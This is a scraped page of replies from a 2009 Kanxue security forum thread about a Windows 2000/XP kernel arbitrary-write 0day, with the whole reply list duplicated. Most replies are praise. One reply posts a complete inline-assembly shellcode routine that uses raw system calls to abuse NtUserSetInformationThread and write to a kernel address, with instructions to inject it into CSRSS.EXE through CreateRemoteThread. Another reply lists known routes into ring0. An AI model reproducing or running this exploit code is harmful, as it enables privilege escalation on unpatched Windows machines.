[原创][0Day]Windows 2000/XP（全补丁）内核任意地址写入漏洞-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (19)
太虚伪了雪币： 263 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 21 回帖 316 粉丝 0 关注私信	太虚伪了 1 2 楼太强了, 马上换2003 2009-3-30 22:54 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 3 楼太强啊~~~ 2009-3-30 23:03 0
liangdong 雪币： 1407 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 228 粉丝 0 关注私信	liangdong 4 楼幸好用的是vista 2009-3-30 23:04 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 5 楼膜拜偶像。。 2009-3-30 23:05 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 6 楼看来很严重啊 2009-3-30 23:06 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 3 关注私信	stalker 8 7 楼看不懂，无法膜拜 2009-3-30 23:13 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 8 楼一路顶过来~~~ 2009-3-30 23:21 0
XSJS 雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 436 粉丝 1 关注私信	XSJS 9 楼膜拜王小姐！ 2009-3-31 01:12 0
dnybz 雪币： 66 活跃值： (835) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 166 粉丝 0 关注私信	dnybz 10 楼这么强？ 2009-3-31 01:38 0
仙果雪币： 1491 活跃值： (975) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 64 关注私信	仙果 19 11 楼可否给源代码 xianguo1985@163.com 2009-3-31 02:38 0
bujin888 雪币： 193 活跃值： (26) 能力值： ( LV9，RANK：210 ) 在线值：发帖 74 回帖 365 粉丝 3 关注私信	bujin888 4 12 楼 procedure ShellCode; asm PUSH EBP MOV EBP,ESP SUB ESP,$3C MOV ECX,DWORD PTR SS:[EBP+8] XOR EAX,EAX MOV DWORD PTR SS:[EBP-$24],EAX MOV DWORD PTR SS:[EBP-$38],EAX MOV EDX,DWORD PTR DS:[ECX+$C] MOV DWORD PTR SS:[EBP-$30],EAX MOV DWORD PTR SS:[EBP-$34],EAX MOV DWORD PTR SS:[EBP-$2C],EAX MOV DWORD PTR SS:[EBP-$28],EAX MOV DWORD PTR SS:[EBP-4],EAX MOV EAX,DWORD PTR DS:[ECX+4] MOV DWORD PTR SS:[EBP-$20],EDX MOV DWORD PTR SS:[EBP-$1C],EAX MOV EAX,DWORD PTR DS:[ECX] LEA EDX,DWORD PTR SS:[EBP-$1C] MOV DWORD PTR SS:[EBP-$3C],18 MOV DWORD PTR SS:[EBP-$18],-1 MOV DWORD PTR SS:[EBP-$14],EDX MOV DWORD PTR SS:[EBP-$10],EAX LEA EAX,DWORD PTR SS:[EBP-$24] PUSH EAX LEA EAX,DWORD PTR SS:[EBP-$3C] PUSH EAX PUSH $60 LEA EAX,DWORD PTR SS:[EBP-4] PUSH EAX MOV EAX,$80 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 TEST EAX,EAX JL @@1 LEA EAX,DWORD PTR SS:[EBP-$C] PUSH EAX PUSH 4 LEA EAX,DWORD PTR SS:[EBP-8] PUSH EAX PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$11DF LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$14 TEST EAX,EAX JL @@1 PUSH 8 PUSH DWORD PTR SS:[EBP-$14] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$1208 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 TEST EAX,EAX JL @@1 LEA EAX,DWORD PTR SS:[EBP-$C] PUSH EAX PUSH 4 PUSH DWORD PTR SS:[EBP-$10] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$11DF LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$14 TEST EAX,EAX JL @@1 MOV EAX,DWORD PTR SS:[EBP-$14] MOV ECX,DWORD PTR SS:[EBP-8] MOV DWORD PTR DS:[EAX],ECX PUSH 8 PUSH DWORD PTR SS:[EBP-$14] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$1208 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 MOV EAX,DWORD PTR SS:[EBP+8] MOV DWORD PTR DS:[EAX+8],1 @@1:MOV EAX,DWORD PTR SS:[EBP-4] TEST EAX,EAX JE @@2 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$19 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,4 @@2:MOV ESP,EBP POP EBP RET end; 把上面的ShellCode 写如CSRSS.EXE CreateRemoteThread 远程执行! 虽然还没膜拜完偶猜大概原理是这样了感谢王小姐 shellcode 大致意思 NtOpenThread NtUserQueryInformationThread //1号漏洞函数 //这两个函数好冷比北极冰还冷 NtUserSetInformationThread //2号漏洞函数 NtClose NTSTATUS NtUserSetInformationThread( IN HANDLE ThreadHandle, IN THREADINFOCLASS ThreadInformationClass, IN PVOID ThreadInformation, IN ULONG ThreadInformationLength ) 2009-3-31 06:11 0
espzj 雪币： 95 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 4 回帖 51 粉丝 0 关注私信	espzj 2 13 楼顶一个，MJ牛啊 2009-3-31 09:41 0
option 雪币： 8026 活跃值： (2511) 能力值： ( LV2，RANK：10 ) 在线值：发帖 39 回帖 712 粉丝 1 关注私信	option 14 楼 MJ怎么学的？专业搞安全的和业余的就不一样 2009-3-31 12:37 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 15 楼我也可以从ring3直接进入ring0.不难不需要什么漏洞类的 2009-3-31 21:56 0
weolar 雪币： 364 活跃值： (152) 能力值： ( LV12，RANK：450 ) 在线值：发帖 142 回帖 620 粉丝 20 关注私信	weolar 10 16 楼能说说思路么？ 2009-3-31 21:58 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 23 关注私信	qihoocom 9 17 楼排除ZwSystemDebugControl,PhysicalMemory ,NtLoadDriver,NtSetSystemInformation,pagefile 你还能进入RING0吗？呵呵 2009-3-31 22:02 0
weolar 雪币： 364 活跃值： (152) 能力值： ( LV12，RANK：450 ) 在线值：发帖 142 回帖 620 粉丝 20 关注私信	weolar 10 18 楼 MJ前辈再说几个排除xx的就好了 2009-4-1 17:48 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 19 楼请继续排除~~ 2009-4-1 17:51 0
heretic 雪币： 217 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 93 粉丝 0 关注私信	heretic 20 楼排除掉MJ，就可以顺利进入ring0了。 2009-4-2 21:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (19)
太虚伪了雪币： 263 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 21 回帖 316 粉丝 0 关注私信	太虚伪了 1 2 楼太强了, 马上换2003 2009-3-30 22:54 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 3 楼太强啊~~~ 2009-3-30 23:03 0
liangdong 雪币： 1407 活跃值： (17) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 228 粉丝 0 关注私信	liangdong 4 楼幸好用的是vista 2009-3-30 23:04 0
zapline 雪币： 2362 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 2376 粉丝 0 关注私信	zapline 5 楼膜拜偶像。。 2009-3-30 23:05 0
lixupeng 雪币： 563 活跃值： (95) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 1636 粉丝 0 关注私信	lixupeng 6 楼看来很严重啊 2009-3-30 23:06 0
stalker 雪币： 399 活跃值： (38) 能力值： (RANK：350 ) 在线值：发帖 70 回帖 1064 粉丝 3 关注私信	stalker 8 7 楼看不懂，无法膜拜 2009-3-30 23:13 0
sudami 雪币： 709 活跃值： (2420) 能力值： ( LV12，RANK：1010 ) 在线值：发帖 71 回帖 1582 粉丝 64 关注私信	sudami 25 8 楼一路顶过来~~~ 2009-3-30 23:21 0
XSJS 雪币： 152 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 436 粉丝 1 关注私信	XSJS 9 楼膜拜王小姐！ 2009-3-31 01:12 0
dnybz 雪币： 66 活跃值： (835) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 166 粉丝 0 关注私信	dnybz 10 楼这么强？ 2009-3-31 01:38 0
仙果雪币： 1491 活跃值： (975) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 64 关注私信	仙果 19 11 楼可否给源代码 xianguo1985@163.com 2009-3-31 02:38 0
bujin888 雪币： 193 活跃值： (26) 能力值： ( LV9，RANK：210 ) 在线值：发帖 74 回帖 365 粉丝 3 关注私信	bujin888 4 12 楼 procedure ShellCode; asm PUSH EBP MOV EBP,ESP SUB ESP,$3C MOV ECX,DWORD PTR SS:[EBP+8] XOR EAX,EAX MOV DWORD PTR SS:[EBP-$24],EAX MOV DWORD PTR SS:[EBP-$38],EAX MOV EDX,DWORD PTR DS:[ECX+$C] MOV DWORD PTR SS:[EBP-$30],EAX MOV DWORD PTR SS:[EBP-$34],EAX MOV DWORD PTR SS:[EBP-$2C],EAX MOV DWORD PTR SS:[EBP-$28],EAX MOV DWORD PTR SS:[EBP-4],EAX MOV EAX,DWORD PTR DS:[ECX+4] MOV DWORD PTR SS:[EBP-$20],EDX MOV DWORD PTR SS:[EBP-$1C],EAX MOV EAX,DWORD PTR DS:[ECX] LEA EDX,DWORD PTR SS:[EBP-$1C] MOV DWORD PTR SS:[EBP-$3C],18 MOV DWORD PTR SS:[EBP-$18],-1 MOV DWORD PTR SS:[EBP-$14],EDX MOV DWORD PTR SS:[EBP-$10],EAX LEA EAX,DWORD PTR SS:[EBP-$24] PUSH EAX LEA EAX,DWORD PTR SS:[EBP-$3C] PUSH EAX PUSH $60 LEA EAX,DWORD PTR SS:[EBP-4] PUSH EAX MOV EAX,$80 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 TEST EAX,EAX JL @@1 LEA EAX,DWORD PTR SS:[EBP-$C] PUSH EAX PUSH 4 LEA EAX,DWORD PTR SS:[EBP-8] PUSH EAX PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$11DF LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$14 TEST EAX,EAX JL @@1 PUSH 8 PUSH DWORD PTR SS:[EBP-$14] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$1208 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 TEST EAX,EAX JL @@1 LEA EAX,DWORD PTR SS:[EBP-$C] PUSH EAX PUSH 4 PUSH DWORD PTR SS:[EBP-$10] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$11DF LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$14 TEST EAX,EAX JL @@1 MOV EAX,DWORD PTR SS:[EBP-$14] MOV ECX,DWORD PTR SS:[EBP-8] MOV DWORD PTR DS:[EAX],ECX PUSH 8 PUSH DWORD PTR SS:[EBP-$14] PUSH 1 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$1208 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,$10 MOV EAX,DWORD PTR SS:[EBP+8] MOV DWORD PTR DS:[EAX+8],1 @@1:MOV EAX,DWORD PTR SS:[EBP-4] TEST EAX,EAX JE @@2 PUSH DWORD PTR SS:[EBP-4] MOV EAX,$19 LEA EDX,DWORD PTR SS:[ESP] INT $2E ADD ESP,4 @@2:MOV ESP,EBP POP EBP RET end; 把上面的ShellCode 写如CSRSS.EXE CreateRemoteThread 远程执行! 虽然还没膜拜完偶猜大概原理是这样了感谢王小姐 shellcode 大致意思 NtOpenThread NtUserQueryInformationThread //1号漏洞函数 //这两个函数好冷比北极冰还冷 NtUserSetInformationThread //2号漏洞函数 NtClose NTSTATUS NtUserSetInformationThread( IN HANDLE ThreadHandle, IN THREADINFOCLASS ThreadInformationClass, IN PVOID ThreadInformation, IN ULONG ThreadInformationLength ) 2009-3-31 06:11 0
espzj 雪币： 95 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 4 回帖 51 粉丝 0 关注私信	espzj 2 13 楼顶一个，MJ牛啊 2009-3-31 09:41 0
option 雪币： 8026 活跃值： (2511) 能力值： ( LV2，RANK：10 ) 在线值：发帖 39 回帖 712 粉丝 1 关注私信	option 14 楼 MJ怎么学的？专业搞安全的和业余的就不一样 2009-3-31 12:37 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 15 楼我也可以从ring3直接进入ring0.不难不需要什么漏洞类的 2009-3-31 21:56 0
weolar 雪币： 364 活跃值： (152) 能力值： ( LV12，RANK：450 ) 在线值：发帖 142 回帖 620 粉丝 20 关注私信	weolar 10 16 楼能说说思路么？ 2009-3-31 21:58 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 23 关注私信	qihoocom 9 17 楼排除ZwSystemDebugControl,PhysicalMemory ,NtLoadDriver,NtSetSystemInformation,pagefile 你还能进入RING0吗？呵呵 2009-3-31 22:02 0
weolar 雪币： 364 活跃值： (152) 能力值： ( LV12，RANK：450 ) 在线值：发帖 142 回帖 620 粉丝 20 关注私信	weolar 10 18 楼 MJ前辈再说几个排除xx的就好了 2009-4-1 17:48 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 19 楼请继续排除~~ 2009-4-1 17:51 0
heretic 雪币： 217 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 93 粉丝 0 关注私信	heretic 20 楼排除掉MJ，就可以顺利进入ring0了。 2009-4-2 21:33 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复